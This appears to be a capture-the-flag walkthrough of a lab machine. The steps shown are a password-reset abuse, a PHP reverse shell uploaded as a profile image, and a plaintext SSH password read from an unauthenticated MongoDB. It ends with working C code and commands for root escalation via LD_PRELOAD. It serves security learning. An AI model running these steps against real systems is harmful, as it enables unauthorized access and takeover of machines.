Road (File Upload, Mongo, Library)

Firstly, we need to enumerate using nmap.

$ nmap -A 10.10.128.233 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-24 14:44 +0630
Nmap scan report for 10.10.128.233
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sky Couriers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.36 seconds

SSH and HTTP ports are open. Let's check HTTP port. In http://10.10.128.233/v2/admin/login.html, we will see login form. We must register and login with this credential. And then you will see Dashboard. You need to reset password at http://10.10.128.233/v2/ResetUser.php.

With this credential admin@sky.thm:user1, we can login to the admin dashboard.

In http://10.10.128.233/v2/profile.php, we can upload a profile image. Let's try to upload PHP reverse shell.

We can see this javascript source code. We can ball back our uploaded profile image image at this url

<!-- /v2/profileimages/ -->
<script type="text/javascript">
        function showtab(tab){
          console.log(tab);
          if(tab == 'new_task'){
            $('#new_task').css('display','block');
            $('#your_task').css('display','none');
          }else{
            $('#new_task').css('display','none');
            $('#your_task').css('display','block');
          }
        }

Now, we get revershell.

We find user flag at /home/webdeveloper/user.txt.

$ wc -c /home/webdeveloper/user.txt
wc -c /home/webdeveloper/user.txt
33 /home/webdeveloper/user.txt

With ss command, we will notice a new open port at local. Port 27017 is Default MongoDB Port.

$ ss -antp
ss -antp
State   Recv-Q  Send-Q            Local Address:Port         Peer Address:Port  Process                                                                         
LISTEN  0       511                   127.0.0.1:9000              0.0.0.0:*                                                                                     
LISTEN  0       4096                  127.0.0.1:27017             0.0.0.0:*                                                                                     
LISTEN  0       151                   127.0.0.1:3306              0.0.0.0:*                                                                                     
LISTEN  0       4096              127.0.0.53%lo:53                0.0.0.0:*                                                                                     
LISTEN  0       128                     0.0.0.0:22                0.0.0.0:*                                                                                     
LISTEN  0       70                    127.0.0.1:33060             0.0.0.0:*           

Let' connect mongo DB and enumerate some credentials.

$ mongo 127.0.0.1
mongo 127.0.0.1
MongoDB shell version v4.4.6
connecting to: mongodb://127.0.0.1:27017/test?compressors=disabled&gssapiServiceName=mongodb
Implicit session: session { "id" : UUID("efb39f6c-cf03-49df-957e-a778d3153de6") }
MongoDB server version: 4.4.6
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
	https://docs.mongodb.com/
Questions? Try the MongoDB Developer Community Forums
	https://community.mongodb.com
---
The server generated these startup warnings when booting: 
        2022-01-24T08:10:27.684+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
        2022-01-24T08:10:32.010+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
---
---
        Enable MongoDB's free cloud-based monitoring service, which will then receive and display
        metrics about your deployment (disk utilization, CPU, operation statistics, etc).

        The monitoring data will be available on a MongoDB website with a unique URL accessible to you
        and anyone you share the URL with. MongoDB may use this information to make product
        improvements and to suggest MongoDB products and deployment options to you.

        To enable free monitoring, run the following command: db.enableFreeMonitoring()
        To permanently disable this reminder, run the following command: db.disableFreeMonitoring()
---
> show dbs
shshow dbs
admin   0.000GB
backup  0.000GB
config  0.000GB
local   0.000GB
> use backup
ususe backup
switched to db backup
> show collections
shshow collections
collection
user
> db.user.find()
dbdb.user.find()
{ "_id" : ObjectId("60ae2661203d21857b184a76"), "Month" : "Feb", "Profit" : "25000" }
{ "_id" : ObjectId("60ae2677203d21857b184a77"), "Month" : "March", "Profit" : "5000" }
{ "_id" : ObjectId("60ae2690203d21857b184a78"), "Name" : "webdeveloper", "Pass" : "BahamasChapp123!@#" }
{ "_id" : ObjectId("60ae26bf203d21857b184a79"), "Name" : "Rohit", "EndDate" : "December" }
{ "_id" : ObjectId("60ae26d2203d21857b184a7a"), "Name" : "Rohit", "Salary" : "30000" }

We see webdeveloper credential. Let's connect ssh with this credential.

$ ssh webdeveloper@10.10.128.233
The authenticity of host '10.10.128.233 (10.10.128.233)' can't be established.
ECDSA key fingerprint is SHA256:zSoCEcBBY73hNL9ItPA4CnB/405/W6GQYsl94qRMkOo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.128.233' (ECDSA) to the list of known hosts.
webdeveloper@10.10.128.233's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 24 Jan 2022 08:48:42 AM UTC

  System load:  0.0               Processes:             122
  Usage of /:   60.0% of 9.78GB   Users logged in:       0
  Memory usage: 64%               IPv4 address for eth0: 10.10.128.233
  Swap usage:   0%


185 updates can be installed immediately.
100 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Fri Oct  8 10:52:42 2021 from 192.168.0.105
webdeveloper@sky:~$ 

Check privileges on this host, we will see LD_ PRELOAD.

$ sudo -l
Matching Defaults entries for webdeveloper on sky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User webdeveloper may run the following commands on sky:
    (ALL : ALL) NOPASSWD: /usr/bin/sky_backup_utility

Build C code and get root privileges from this source https://www.hackingarticles.in/linux-privilege-escalation-using-ld_preload/

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

Let's compile to generate shared library file.

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/sky_backup_utility

Finally, we get root shell on this host and root.txt.